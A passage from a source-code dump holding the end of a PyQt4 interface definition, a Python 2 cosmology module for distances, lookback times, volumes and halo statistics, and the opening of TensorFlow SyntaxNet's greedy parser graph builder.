MainWindow.delayBox.setProperty("value", 5.0)
MainWindow.delayBox.setObjectName(_fromUtf8("delayBox"))
MainWindow.mainButton = QtGui.QPushButton(MainForm)
MainWindow.mainButton.setGeometry(QtCore.QRect(210, 10, 61, 41))
MainWindow.mainButton.setObjectName(_fromUtf8("mainButton"))
MainWindow.stopButton = QtGui.QPushButton(MainForm)
MainWindow.stopButton.setGeometry(QtCore.QRect(210, 60, 61, 41))
MainWindow.stopButton.setObjectName(_fromUtf8("stopButton"))
QtCore.QMetaObject.connectSlotsByName(MainForm)
MainForm.setTabOrder(MainWindow.browseButton, MainWindow.delayBox)
MainForm.setTabOrder(MainWindow.delayBox, MainWindow.formatBox)
MainForm.setTabOrder(MainWindow.formatBox, MainWindow.mainButton)
MainForm.setTabOrder(MainWindow.mainButton, MainWindow.stopButton)
MainForm.setTabOrder(MainWindow.stopButton, MainWindow.ouputText)
MainForm.setWindowTitle(QtGui.QApplication.translate("MainForm", "Title", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.browseButton.setText(QtGui.QApplication.translate("MainForm", "Browse", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label.setText(QtGui.QApplication.translate("MainForm", "Output :", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label_2.setText(QtGui.QApplication.translate("MainForm", "Delay (seconds) :", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(0, QtGui.QApplication.translate("MainForm", "png", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(1, QtGui.QApplication.translate("MainForm", "jpg", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(2, QtGui.QApplication.translate("MainForm", "mp4", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(3, QtGui.QApplication.translate("MainForm", "avi", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.formatBox.setItemText(4, QtGui.QApplication.translate("MainForm", "mov", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.label_3.setText(QtGui.QApplication.translate("MainForm", "Format:", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.mainButton.setText(QtGui.QApplication.translate("MainForm", "Start", None, QtGui.QApplication.UnicodeUTF8))
MainWindow.stopButton.setText(QtGui.QApplication.translate("MainForm", "Stop", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | 7,120,725,703,614,476,000 | 70.086207 | 131 | 0.770313 | false |
bamford/astrobamf | cosmology.py | 1 | 17513 | # cosmology.py
# (formerly distance_modulus.py)
from math import log, sqrt, pi, sin, cos, exp
from nr import erffc
#from ppgplot_spb import *
from checkarray import checkarray
import scipy.integrate
import numpy as N
# WMAP 1-year results
h0_WMAP1 = 0.71
H0_WMAP1 = h0_WMAP1 * 100.0
omega_m0_WMAP1 = 0.135 / h0_WMAP1**2
# WMAP 3-year results
h0_WMAP3 = 0.73
H0_WMAP3 = h0_WMAP3 * 100.0
omega_m0_WMAP3 = 0.127 / h0_WMAP3**2
H0_std = 70.0
omega_m0_std = 0.30
omega_lambda0_std = 1.0 - omega_m0_std
H0_classical = 75.0
q0_classical = 0.05
c0 = 299792.458 # km/s
# mass of Sun in kg
M_sun_kg = 1.9889e30 # kg
# Mpc in kilometres
Mpc_km = 3.0857e19 # km
# Newton's gravitational constant
G_N = 6.673e-11 # m**3 kg**(-1) s**(-2)
# Number of square degrees over full sky
sky_sq_deg = 4*pi * (180/pi)**2
# The distance modulus for a flat universe with
# omega_matter + omega_lambda = 1
def dmod_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dL = dL_flat(z, H0, omega_m0)
mu = 5.0 * N.log10(dL*1.E6) - 5.0
return mu
# Luminosity distance for a flat universe with
# omega_matter + omega_lambda = 1
# in Mpc
def dL_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dL = (1.0+z) * (c0/H0) * dc(omega_m0, z)
return dL
# Comoving distance for a flat universe with
# omega_matter + omega_lambda = 1
# in Mpc
def dC_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dC = (c0/H0) * dc(omega_m0, z)
return dC
# Angular diameter distance for a flat universe with
# omega_matter + omega_lambda = 1
def dA_flat(z, H0=H0_std, omega_m0=omega_m0_std):
dA = dL_flat(z, H0, omega_m0) / (1.0+z)**2
return dA
# Angular scale distance for a flat universe
arcsec_in_rad = 180*60*60/pi
kpc_in_Mpc = 10**3
ang_scale_conversion = kpc_in_Mpc / arcsec_in_rad
def ang_scale_flat(z, H0=H0_std, omega_m0=omega_m0_std):
# kpc/arcsec
dA = dA_flat(z, H0, omega_m0)
ang_scale = dA * ang_scale_conversion
return ang_scale
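# Illustrative usage (not part of the original module): ang_scale_flat() returns
# kpc per arcsec, so an observed angular size converts to a proper size as
#
#   size_kpc = theta_arcsec * ang_scale_flat(z)
#
# with theta_arcsec the measured angular size in arcseconds.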
# The distance modulus for a classical universe with
# omega_lambda = 0
def dmod_classical(z, H0=H0_classical, q0=q0_classical):
dL = dL_classical(z, H0, q0)
mu = 5.0 * N.log10(dL*1.E6) - 5.0
return mu
# Luminosity distance for a classical universe with
# omega_lambda = 0
# in Mpc
def dL_classical(z, H0=H0_classical, q0=q0_classical):
dL = c0/(H0*q0*q0) * (q0*z + (q0-1.0) * (sqrt(1.0 + 2.0*q0*z)-1.))
return dL
# Angular diameter distance for a classical universe with
# omega_lambda = 0
def dA_classical(z, H0=H0_classical, q0=q0_classical):
dA = dL_classical(z, H0, q0) / (1.0+z)**2
return dA
# calculate comoving distance (to a factor) for a flat lambda universe
# old integration method
def dc_old(omega_m0, z, dz=None):
# probably not very efficient:
# takes 0.25 cpu seconds for z=1.5
# 0.08 cpu seconds for z=0.5
# should use clever integration technique instead
if dz is None: dz = 0.00001
d = 0.0
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
for z1 in (N.arange(int(z/dz)+1) * dz):
d = d + rsom0 * dz/sqrt((1.0+z1)**3.0 - 1.0 + rom0)
return d
# calculate comoving distance (to a factor) for a flat lambda universe
# improved integration method
def dc_no_array(omega_m0, z):
# function to integrate
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
def rEz(z1):
return rsom0 / sqrt((1.0+z1)**3.0 - 1.0 + rom0)
d, derr = scipy.integrate.quad(rEz, 0.0, z)
return d
# calculate comoving distance (to a factor) for a flat lambda universe
# improved integration method, added support for arrays
def dc(omega_m0, z):
tz = str(type(z))
if 'float' in tz or 'int' in tz:
z = [z]
z = N.asarray(z)
d = N.zeros(z.shape)
for i, zi in enumerate(z):
# function to integrate
rom0 = 1.0/omega_m0
rsom0 = 1.0/sqrt(omega_m0)
def rEz(z1):
return rsom0 / sqrt((1.0+z1)**3.0 - 1.0 + rom0)
di, dierr = scipy.integrate.quad(rEz, 0.0, zi, limit=100)
d[i] = di
if len(d) == 1:
d = d[0]
return d
# calculate the look-back time for a flat lambda universe
def lt_flat_old(z, H0=H0_std, omega_m0=omega_m0_std, dz=None):
# probably not very efficient
# should use clever integration technique instead
# dz=0.0001 gives an accuracy of 0.01 Gyr for all z
# dz=0.00001 gives an accuracy of 0.001 Gyr for all z
if dz is None: dz = 0.00001
t = 0.0
omega_lambda = 1.0 - omega_m0
for z1 in (N.arange(int(z/dz)+1) * dz):
zfactor = 1.0 + z1
t = t + dz / ( zfactor * sqrt( zfactor**2 * (1+omega_m0*z1) - z1*(2+z1)*omega_lambda ) )
# t currently a fraction of the Hubble time
# convert into Gyr
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
t = t / H0perGyr
return t
# calculate the look-back time for a flat lambda universe
# improved integration method
def lt_flat(z, H0=H0_std, omega_m0=omega_m0_std):
omega_lambda = 1.0 - omega_m0
    z = checkarray(z)  # accept scalar z as well as arrays
d = N.zeros(z.shape)
for i, zi in enumerate(z):
# function to integrate
def intfn(z1):
zfactor = 1.0 + z1
return 1.0 / (zfactor * sqrt(zfactor**2 * (1+omega_m0*z1) -
z1*(2+z1)*omega_lambda))
t, terr = scipy.integrate.quad(intfn, 0.0, zi)
# t currently a fraction of the Hubble time
# convert into Gyr
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
d[i] = t / H0perGyr
if len(d) == 1:
d = d[0]
return d
# calculate age of a flat universe
def age_flat(z, H0=H0_std, omega_m0=omega_m0_std):
mperpc = 3.085677581e16
secperday = 31557600
H0persec = H0 * 1.0e-3 / mperpc
H0perGyr = H0persec * secperday * 1.0e9
soom0 = sqrt(1.0-omega_m0)
age_now = 2.0/(3.0*H0perGyr) * 1.0/(2*soom0) * log((1+soom0)/(1-soom0))
lbt = lt_flat(z, H0, omega_m0)
age = age_now - lbt
return age
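# Example (illustrative, not part of the original module): with the defaults
# (H0 = 70 km/s/Mpc, omega_m0 = 0.3) age_flat(0.0) gives the present age of the
# universe, roughly 13.5 Gyr, and age_flat(z) gives that minus the look-back
# time lt_flat(z).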
# calculate ratio of comoving volume elements at two redshifts
# deduced from MIT astronomy course notes by Edmund Bertschinger, 1999
#http://ocw.mit.edu/NR/rdonlyres/Physics/8-942Fall2001/2F658E61-68A8-40F4-9168-B7AD0E23CA49/0/cosmog.pdf
def vol_ratio(z1, z2, H0=H0_std,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
# ratio of comoving volume element at z1 to that at z2
Hz1 = H(z1, H0, omega_m0, omega_lambda0)
Hz2 = H(z2, H0, omega_m0, omega_lambda0)
dc1 = dc(omega_m0, z1)
dc2 = dc(omega_m0, z2)
return Hz2/Hz1 * (dc1/dc2)**2
# calculate the comoving volume enclosed between two redshifts
# deduced from eqn. 9 in Shen et al, 2003, MNRAS, 343, 978
# All-sky, in cubic Mpc
def vol(zmin, zmax, H0=H0_std,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
zmax = checkarray(zmax)
zmin = checkarray(zmin)
v = N.zeros(zmax.shape)
# function to integrate
def intfn(z):
return (4*pi * dA_flat(z, H0, omega_m0)**2 * (1+z)**2 * c0 /
H(z, H0, omega_m0, omega_lambda0))
for i in range(len(zmax)):
zmini = zmin[i]
zmaxi = zmax[i]
vi, vierr = scipy.integrate.quadrature(intfn, zmini, zmaxi, tol=1.0e-3, maxiter=100)
# this tol is easily sufficient for any reasonable zmin, zmax
v[i] = vi
if len(v) == 1:
v = v[0]
return v
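# Illustrative usage (not part of the original module): vol() is all-sky, so the
# comoving volume probed by a survey covering area_sq_deg square degrees is
# obtained by scaling with the sky fraction:
#
#   survey_volume = vol(zmin, zmax) * area_sq_deg / sky_sq_deg   # Mpc**3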
# calculate the maximum redshift at which an object with absolute
# magnitude mabs could be included in a survey limited to apparent
# magnitude mapplim. Optimised to do many objects in one go.
def zmax(mabs, mapplim, zlow, zhigh, nz=None):
mabs = checkarray(mabs)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zhigh+deltaz/10, zlow, -deltaz)
dmodlist = dmod_flat(zlist)
mabslist = mapplim - dmodlist
i = N.searchsorted(mabslist, mabs, side='left')
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
m1 = mabslist[i-1]
m2 = mabslist[i]
s = (z2-z1)/(m2-m1)
zmax = z1 + s*(mabs-m1)
N.putmask(zmax, ilow, zhigh)
N.putmask(zmax, ihigh, zlow)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
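# Illustrative usage (not part of the original module), e.g. for 1/Vmax
# corrections: given absolute magnitudes mabs and a survey limit mapplim,
#
#   zlim = zmax(mabs, mapplim, zlow, zhigh)
#   vmax = vol(zlow, zlim) * area_sq_deg / sky_sq_deg
#
# where area_sq_deg is the survey area and zlow, zhigh bound the sample.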
# calculate the maximum redshift at which an object with absolute
# size rkpc could be included in a survey limited to apparent
# size raslim. Optimised to do many objects in one go.
def zmax_size(rkpc, raslim, zlow, zhigh, nz=None):
rkpc = checkarray(rkpc)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zlow, zhigh+deltaz/10, deltaz)
angscalelist = ang_scale_flat(zlist)
rkpclist = raslim * angscalelist
i = N.searchsorted(rkpclist, rkpc)
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
r1 = rkpclist[i-1]
r2 = rkpclist[i]
s = (z2-z1)/(r2-r1)
zmax = z1 + s*(rkpc-r1)
N.putmask(zmax, ilow, zlow)
N.putmask(zmax, ihigh, zhigh)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
# calculate the maximum redshift at which an object with absolute
# surface brightness sbabs could be included in a survey limited to
# apparent surface brightness sbapplim.
# Optimised to do many objects in one go.
def zmax_sb(sbabs, sbapplim, zlow, zhigh, nz=None):
sbabs = checkarray(sbabs)
if nz is None:
deltaz = 0.001
nz = int((zhigh-zlow)/deltaz)
deltaz = (zhigh-zlow)/float(nz)
zlist = N.arange(zhigh+deltaz/10, zlow, -deltaz)
dmodlist = dmod_flat(zlist)
angscalelist = ang_scale_flat(zlist)
sbabslist = sbapplim - dmodlist + 2.5*N.log10(angscalelist**2)
i = N.searchsorted(sbabslist, sbabs)
ihigh = i == nz+1
N.putmask(i, ihigh, nz)
ilow = i == 0
N.putmask(i, ilow, 1)
z1 = zlist[i-1]
z2 = zlist[i]
sb1 = sbabslist[i-1]
sb2 = sbabslist[i]
s = (z2-z1)/(sb2-sb1)
zmax = z1 + s*(sbabs-sb1)
N.putmask(zmax, ilow, zhigh)
N.putmask(zmax, ihigh, zlow)
if zmax.shape == (1,):
zmax = zmax[0]
return zmax
#----------------------------------------------------------------------
# Calculate some cosmological structure formation information
# from the equations in Mo & White, 2002, MNRAS, 336, 112.
# calculate the number of haloes per unit comoving volume at
# redshift z with mass in the interval [M, M+dM]
# using the Sheth & Tormen (1999, 2001, 2002) function
def n(M, z, dM,
omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
A = 0.322
a = 0.707
q = 0.3
rho_m0 = omega_m0_std * rho_c(H(z))
nu0 = nu_from_M(M, z, omega_m0, omega_lambda0)
nu1 = nu_from_M(M+dM, z, omega_m0, omega_lambda0)
nu0_primed = sqrt(a) * nu0
print 'nu0_primed:', nu0_primed
nu1_primed = sqrt(a) * nu1
dnu_primed_by_dM = (nu1_primed - nu0_primed) / dM
print 'dnu_primed_by_dM:', dnu_primed_by_dM
term1 = 1.0 + 1.0/(nu0_primed**(2*q))
term2 = sqrt(2.0/pi) * (rho_m0 / M) * dnu_primed_by_dM
term3 = exp(-(nu0_primed**2) / 2.0)
print 'term1:', term1
print 'term2:', term2
print 'term3:', term3
return A * term1 * term2 * term3
# calculate the fraction of all mass in haloes with mass exceeding M
# (eqn. 15)
def F(nu):
return 0.4 * (1.0 + 0.4/(nu**0.4)) * erffc(0.85*nu/sqrt(2))
# calculate the sigmaM corresponding to a given nu,
# the sigma of the halo in terms of a density contrast
def sigmaM_from_nu(nu, z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
delta_c = 1.69
return delta_c / (nu * D(z, omega_m0, omega_lambda0))
# calculate nu, the sigma of the halo in terms of a density
# contrast, given sigmaM
def nu_from_M(M, z, H0=H0_std, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
delta_c = 1.69
R = R_Lagrangian(M, H0, omega_m0)
varM = var(R, H0, omega_m0)
sigmaM = sqrt(varM)
Dz = D(z, omega_m0, omega_lambda0)
print 'Dz:', Dz
print 'sigmaM:', sigmaM
return delta_c / (sigmaM * Dz)
# calculate the growth factor for linear perturbations
# following Carroll, Press & Turner (1992), as given by
# Mo & White (2002)
def D(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
omega_mz = omega_m(z, omega_m0, omega_lambda0)
omega_lambdaz = omega_lambda(z, omega_m0, omega_lambda0)
return g(z, omega_mz, omega_lambdaz) / (g(0, omega_m0, omega_lambda0) * (1.0+z))
# calculate function used in D (eqn. 10)
def g(z, omega_m, omega_lambda):
term1 = omega_m**(4.0/7.0) - omega_lambda
term2 = (1 + omega_m/2.0)*(1+omega_lambda/70.0)
return (5.0/2.0) * omega_m / (term1 + term2)
# calculate omega_matter at any redshift (eqn. 2)
def omega_m(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return omega_m0 * (1.0+z)**3 / (E(z, omega_m0, omega_lambda0)**2)
# calculate omega_lambda at any redshift (eqn. 11)
def omega_lambda(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return omega_lambda0 / (E(z, omega_m0, omega_lambda0)**2)
# calculate the factor giving the evolution of the hubble constant
# as a function of redshift (eqn. 3)
def E(z, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
omega_total = omega_m0 + omega_lambda0
return N.sqrt(omega_lambda0 + (1.0 - omega_total) * (1.0+z)**2 +
omega_m0 * (1.0+z)**3)
# calculate the Hubble constant at any redshift (eqn. 2)
def H(z, H0=H0_std, omega_m0=omega_m0_std, omega_lambda0=omega_lambda0_std):
return H0 * E(z, omega_m0, omega_lambda0)
# calculate Lagrangian radius of a halo of mass M
def R_Lagrangian(M, H0=H0_std, omega_m0=omega_m0_std):
return (3.0 * M / (4 * pi * omega_m0 * rho_c(H0)))**(1.0/3.0)
# calculate critical density of universe given Hubble constant
def rho_c(H):
# H in km s**(-1) Mpc**(-1)
H = H / Mpc_km# s**(-1)
rho = 3.0 * H**2 / (8.0 * pi * G_N) # kg m**(-3)
return rho / M_sun_kg * (Mpc_km * 1000.0)**3 # M_sun Mpc**(-3)
# transfer function representing differential growth since early times
# from Bardeen et al. (1986) as given in Mo & White (2002) eqn. 8.
def T(k, H0=H0_std, omega_m0=omega_m0_std):
q = k / (omega_m0 * (H0/100.0)**2)
if abs(q) < 1.0e-6:
term1 = 1.0
else:
term1 = log(1 + 2.34*q) / (2.34*q)
term2 = 1 + 3.89*q + (16.1*q)**2 + (5.46*q)**3 + (6.71*q)**4
return term1 * term2**(-1.0/4.0)
# approximation of CDM power spectrum (eqn. 7)
def P(k, H0=H0_std, omega_m0=omega_m0_std):
return k * T(k, H0, omega_m0)**2
# calculate normalisation of P
def intP(H0=H0_std, omega_m0=omega_m0_std, dk=None):
if dk is None:
dk = 0.0001
#pgopen('P_func.ps/ps')
k_array = []
term_array = []
sum = 0.0
i = 0
kmax = 0
while 1:
k = (i+0.0)*dk
term = P(k, H0, omega_m0)
sum = sum + term * dk
k_array.append(k)
term_array.append(term)
if i > 0:
if kmax == 0:
if (term / sum) < 0.01:
kmax = i*2
else:
if i >= kmax:
#print 'integration took %i steps'%i
break
#print k, sum, term, term*dk / sum
else:
pass
#print k, sum, term
i = i+1
#k_array = N.array(k_array)
#term_array = N.array(term_array)
#pgenv(0.0, 1.0, 0.0, 12.0)
#pgline(k_array, term_array/sum)
#pgclos()
return sum
# variance of Gaussian density field at a given radius
def var(R, H0=H0_std, omega_m0=omega_m0_std, dk=None):
# this is integrated using a very simple method
# the function consists of a number of similarly spaced,
# decreasing peaks, with only the first three contributing
# significantly to the integral (first is much bigger)
if dk is None:
dk = 0.01 / R # seems to give about 1000 steps and
# decent accuracy (<1%) for 0.03 < R < 100
#f = file('var_func', 'w')
#pgopen('var_func.ps/ps')
#k_array = []
#term_array = []
sum = 0.0
i = 0
kmax = None
while 1:
k = i*dk
term = k**2 * P(k, H0, omega_m0) * W(k*R)**2
sum = sum + term * dk
#f.write('%16.6g%16.6g%16.6g\n'%(k, term, sum))
#k_array.append(k)
#term_array.append(term)
if i > 0:
if kmax is None:
if (term / sum) < 0.01:
# given good sampling provided by choice of dk
# above, this occurs at end of first peak, so
# setting kmax to three times this point gets
# all three significant peaks.
kmax = i*3
else:
if i >= kmax:
#print 'integration took %i steps'%i
break
#print k, sum, term, term*dk / sum
else:
pass
#print k, sum, term
i = i+1
#f.close()
#k_array = N.array(k_array)
#term_array = N.array(term_array)
#pgenv(0.0, k, 0.0, 2.0e-5)
#pgline(k_array, term_array)
#pgclos()
arb_scaling = 1.0e18
return sum / (2.0 * pi**2) / intP() * arb_scaling
# Fourier transform of a top-hat filter with radius R
# for use by var (x=kR)
def W(x):
if x < 1e-6:
return 1.0
else:
return 3.0 * (sin(x) - x*cos(x)) / x**3
| mit | 5,570,644,595,929,895,000 | 31.857411 | 104 | 0.600525 | false |
deepakgupta1313/models | syntaxnet/syntaxnet/graph_builder.py | 1 | 23995 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Builds parser models."""
import tensorflow as tf
import syntaxnet.load_parser_ops
from tensorflow.python.ops import control_flow_ops as cf
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import tf_logging as logging
from syntaxnet.ops import gen_parser_ops
def BatchedSparseToDense(sparse_indices, output_size):
"""Batch compatible sparse to dense conversion.
This is useful for one-hot coded target labels.
Args:
sparse_indices: [batch_size] tensor containing one index per batch
output_size: needed in order to generate the correct dense output
Returns:
A [batch_size, output_size] dense tensor.
"""
eye = tf.diag(tf.fill([output_size], tf.constant(1, tf.float32)))
return tf.nn.embedding_lookup(eye, sparse_indices)
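# Illustrative example (not part of the original module): converting a batch of
# sparse action ids into one-hot rows, as used for the training targets below.
#
#   ids = tf.constant([1, 3])
#   BatchedSparseToDense(ids, output_size=4)
#   # -> [[0., 1., 0., 0.],
#   #     [0., 0., 0., 1.]]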
def EmbeddingLookupFeatures(params, sparse_features, allow_weights):
"""Computes embeddings for each entry of sparse features sparse_features.
Args:
params: list of 2D tensors containing vector embeddings
sparse_features: 1D tensor of strings. Each entry is a string encoding of
dist_belief.SparseFeatures, and represents a variable length list of
feature ids, and optionally, corresponding weights values.
allow_weights: boolean to control whether the weights returned from the
SparseFeatures are used to multiply the embeddings.
Returns:
A tensor representing the combined embeddings for the sparse features.
For each entry s in sparse_features, the function looks up the embeddings
for each id and sums them into a single tensor weighing them by the
weight of each id. It returns a tensor with each entry of sparse_features
replaced by this combined embedding.
"""
if not isinstance(params, list):
params = [params]
# Lookup embeddings.
sparse_features = tf.convert_to_tensor(sparse_features)
indices, ids, weights = gen_parser_ops.unpack_sparse_features(sparse_features)
embeddings = tf.nn.embedding_lookup(params, ids)
if allow_weights:
# Multiply by weights, reshaping to allow broadcast.
broadcast_weights_shape = tf.concat_v2([tf.shape(weights), [1]], 0)
embeddings *= tf.reshape(weights, broadcast_weights_shape)
# Sum embeddings by index.
return tf.unsorted_segment_sum(embeddings, indices, tf.size(sparse_features))
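# Shape sketch (illustrative, not part of the original module); `num_ids` and
# `dim` are placeholder names:
#
#   params = tf.get_variable('embeddings', [num_ids, dim])
#   combined = EmbeddingLookupFeatures(params, sparse_features, False)
#   # combined has shape [tf.size(sparse_features), dim]: one row per input
#   # string, each the sum of the embeddings of the ids it encodes.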
class GreedyParser(object):
"""Builds a Chen & Manning style greedy neural net parser.
Builds a graph with an optional reader op connected at one end and
operations needed to train the network on the other. Supports multiple
network instantiations sharing the same parameters and network topology.
The following named nodes are added to the training and eval networks:
epochs: a tensor containing the current epoch number
cost: a tensor containing the current training step cost
gold_actions: a tensor containing actions from gold decoding
feature_endpoints: a list of sparse feature vectors
logits: output of the final layer before computing softmax
The training network also contains:
train_op: an op that executes a single training step
Typical usage:
parser = graph_builder.GreedyParser(num_actions, num_features,
num_feature_ids, embedding_sizes,
hidden_layer_sizes)
parser.AddTraining(task_context, batch_size=5)
with tf.Session('local') as sess:
# This works because the session uses the same default graph as the
# GraphBuilder did.
sess.run(parser.inits.values())
while True:
tf_epoch, _ = sess.run([parser.training['epoch'],
parser.training['train_op']])
if tf_epoch[0] > 0:
break
"""
def __init__(self,
num_actions,
num_features,
num_feature_ids,
embedding_sizes,
hidden_layer_sizes,
seed=None,
gate_gradients=False,
use_locking=False,
embedding_init=1.0,
relu_init=1e-4,
bias_init=0.2,
softmax_init=1e-4,
averaging_decay=0.9999,
use_averaging=True,
check_parameters=True,
check_every=1,
allow_feature_weights=False,
only_train='',
arg_prefix=None,
**unused_kwargs):
"""Initialize the graph builder with parameters defining the network.
Args:
num_actions: int size of the set of parser actions
num_features: int list of dimensions of the feature vectors
num_feature_ids: int list of same length as num_features corresponding to
the sizes of the input feature spaces
embedding_sizes: int list of same length as num_features of the desired
embedding layer sizes
hidden_layer_sizes: int list of desired relu layer sizes; may be empty
seed: optional random initializer seed to enable reproducibility
gate_gradients: if True, gradient updates are computed synchronously,
ensuring consistency and reproducibility
use_locking: if True, use locking to avoid read-write contention when
updating Variables
embedding_init: sets the std dev of normal initializer of embeddings to
embedding_init / embedding_size ** .5
relu_init: sets the std dev of normal initializer of relu weights
to relu_init
bias_init: sets constant initializer of relu bias to bias_init
softmax_init: sets the std dev of normal initializer of softmax init
to softmax_init
averaging_decay: decay for exponential moving average when computing
averaged parameters, set to 1 to do vanilla averaging
use_averaging: whether to use moving averages of parameters during evals
check_parameters: whether to check for NaN/Inf parameters during
training
check_every: checks numerics every check_every steps.
allow_feature_weights: whether feature weights are allowed.
      only_train: the comma-separated set of parameter names to train. If empty,
all model parameters will be trained.
arg_prefix: prefix for context parameters.
"""
self._num_actions = num_actions
self._num_features = num_features
self._num_feature_ids = num_feature_ids
self._embedding_sizes = embedding_sizes
self._hidden_layer_sizes = hidden_layer_sizes
self._seed = seed
self._gate_gradients = gate_gradients
self._use_locking = use_locking
self._use_averaging = use_averaging
self._check_parameters = check_parameters
self._check_every = check_every
self._allow_feature_weights = allow_feature_weights
self._only_train = set(only_train.split(',')) if only_train else None
self._feature_size = len(embedding_sizes)
self._embedding_init = embedding_init
self._relu_init = relu_init
self._softmax_init = softmax_init
self._arg_prefix = arg_prefix
# Parameters of the network with respect to which training is done.
self.params = {}
# Other variables, with respect to which no training is done, but which we
# nonetheless need to save in order to capture the state of the graph.
self.variables = {}
# Operations to initialize any nodes that require initialization.
self.inits = {}
# Training- and eval-related nodes.
self.training = {}
self.evaluation = {}
self.saver = None
# Nodes to compute moving averages of parameters, called every train step.
self._averaging = {}
self._averaging_decay = averaging_decay
# Pretrained embeddings that can be used instead of constant initializers.
self._pretrained_embeddings = {}
# After the following 'with' statement, we'll be able to re-enter the
# 'params' scope by re-using the self._param_scope member variable. See for
# instance _AddParam.
with tf.name_scope('params') as self._param_scope:
self._relu_bias_init = tf.constant_initializer(bias_init)
@property
def embedding_size(self):
size = 0
for i in range(self._feature_size):
size += self._num_features[i] * self._embedding_sizes[i]
return size
def _AddParam(self,
shape,
dtype,
name,
initializer=None,
return_average=False):
"""Add a model parameter w.r.t. we expect to compute gradients.
_AddParam creates both regular parameters (usually for training) and
averaged nodes (usually for inference). It returns one or the other based
on the 'return_average' arg.
Args:
shape: int list, tensor shape of the parameter to create
dtype: tf.DataType, data type of the parameter
name: string, name of the parameter in the TF graph
      initializer: optional initializer for the parameter
return_average: if False, return parameter otherwise return moving average
Returns:
parameter or averaged parameter
"""
if name not in self.params:
step = tf.cast(self.GetStep(), tf.float32)
# Put all parameters and their initializing ops in their own scope
# irrespective of the current scope (training or eval).
with tf.name_scope(self._param_scope):
self.params[name] = tf.get_variable(name, shape, dtype, initializer)
param = self.params[name]
if initializer is not None:
self.inits[name] = state_ops.init_variable(param, initializer)
if self._averaging_decay == 1:
logging.info('Using vanilla averaging of parameters.')
ema = tf.train.ExponentialMovingAverage(decay=(step / (step + 1.0)),
num_updates=None)
else:
ema = tf.train.ExponentialMovingAverage(decay=self._averaging_decay,
num_updates=step)
self._averaging[name + '_avg_update'] = ema.apply([param])
self.variables[name + '_avg_var'] = ema.average(param)
self.inits[name + '_avg_init'] = state_ops.init_variable(
ema.average(param), tf.zeros_initializer)
return (self.variables[name + '_avg_var'] if return_average else
self.params[name])
def GetStep(self):
def OnesInitializer(shape, dtype=tf.float32, partition_info=None):
return tf.ones(shape, dtype)
return self._AddVariable([], tf.int32, 'step', OnesInitializer)
def _AddVariable(self, shape, dtype, name, initializer=None):
if name in self.variables:
return self.variables[name]
self.variables[name] = tf.get_variable(name, shape, dtype, initializer)
if initializer is not None:
self.inits[name] = state_ops.init_variable(self.variables[name],
initializer)
return self.variables[name]
def _ReluWeightInitializer(self):
with tf.name_scope(self._param_scope):
return tf.random_normal_initializer(stddev=self._relu_init,
seed=self._seed)
def _EmbeddingMatrixInitializer(self, index, embedding_size):
if index in self._pretrained_embeddings:
return self._pretrained_embeddings[index]
else:
return tf.random_normal_initializer(
stddev=self._embedding_init / embedding_size**.5,
seed=self._seed)
def _AddEmbedding(self,
features,
num_features,
num_ids,
embedding_size,
index,
return_average=False):
"""Adds an embedding matrix and passes the `features` vector through it."""
embedding_matrix = self._AddParam(
[num_ids, embedding_size],
tf.float32,
'embedding_matrix_%d' % index,
self._EmbeddingMatrixInitializer(index, embedding_size),
return_average=return_average)
embedding = EmbeddingLookupFeatures(embedding_matrix,
tf.reshape(features,
[-1],
name='feature_%d' % index),
self._allow_feature_weights)
return tf.reshape(embedding, [-1, num_features * embedding_size])
def _BuildNetwork(self, feature_endpoints, return_average=False):
"""Builds a feed-forward part of the net given features as input.
The network topology is already defined in the constructor, so multiple
